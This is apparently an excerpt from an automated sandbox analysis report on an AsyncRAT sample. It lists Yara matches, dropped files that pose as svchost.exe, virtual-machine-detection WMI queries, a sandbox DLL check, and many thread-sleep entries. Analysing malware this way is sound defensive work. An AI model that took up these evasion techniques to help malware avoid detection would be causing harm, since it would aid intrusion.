                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AsyncRAT
                    Source: Yara matchFile source: zrrHgsDzgS.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.zrrHgsDzgS.exe.660000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: zrrHgsDzgS.exe PID: 6452, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED
                    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: zrrHgsDzgS.exe, udwnme.exe.7.dr, luglzv.exe.7.dr, svchost.exe.0.drBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeMemory allocated: FE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeMemory allocated: 2970000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeMemory allocated: 27C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 17F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 32A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 52A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2D30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2D30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 4D30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeMemory allocated: 1470000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeMemory allocated: 3000000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeMemory allocated: 2D50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeMemory allocated: DC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeMemory allocated: 29F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeMemory allocated: F90000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 599782Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 599657Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 599516Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 599391Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 599266Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 599132Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 598986Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 598797Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 598684Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 598469Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 598344Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 598233Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 598112Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 597993Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 597875Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 597766Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 597641Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 597530Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 597410Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 597282Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 597172Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 597063Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 596938Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 596813Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 596688Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 596563Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 596437Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 596328Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 596219Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 596110Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 595985Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 595735Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 595610Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 595485Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 595360Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 595235Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 595110Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 594985Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 594860Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 594719Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 594610Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 594485Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 594351Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 594235Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 594110Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 593985Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 593860Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 593735Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599874
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599765
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599656
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599546
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599437
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599325
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599218
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599109
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598999
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598890
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598780
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598671
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598562
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598453
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598343
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598233
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598114
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 597984
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 597874
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 597765
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 597655
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 597546
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595625
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595515
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595406
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595296
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595187
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595077
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 594968
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 594859
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 594749
                    Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 1880Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 7972Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3319Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1052Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWindow / User API: threadDelayed 7189Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWindow / User API: threadDelayed 2617Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3237
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 915
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWindow / User API: threadDelayed 4086
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWindow / User API: threadDelayed 5748
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exe TID: 6492Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 6644Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2352Thread sleep count: 1880 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2352Thread sleep count: 7972 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 5808Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760Thread sleep count: 3319 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2708Thread sleep count: 1052 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1772Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2676Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -599891s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -599782s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -599657s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -599516s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -599391s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -599266s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -599132s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -598986s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -598797s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -598684s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -598578s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -598469s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -598344s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -598233s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -598112s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -597993s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -597875s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -597766s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -597641s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -597530s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -597410s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -597282s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -597172s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -597063s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -596938s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -596813s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -596688s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -596563s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -596437s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -596328s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -596219s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -596110s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -595985s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -595860s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -595735s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -595610s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -595485s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -595360s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -595235s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -595110s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -594985s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -594860s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -594719s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -594610s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -594485s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -594351s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -594235s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -594110s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -593985s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -593860s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044Thread sleep time: -593735s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5852Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2676Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -33204139332677172s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -599874s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -599765s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -599656s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -599546s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -599437s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -599325s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -599218s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -599109s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -598999s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -598890s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -598780s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -598671s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -598562s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -598453s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -598343s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -598233s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -598114s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -597984s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -597874s >= -30000s
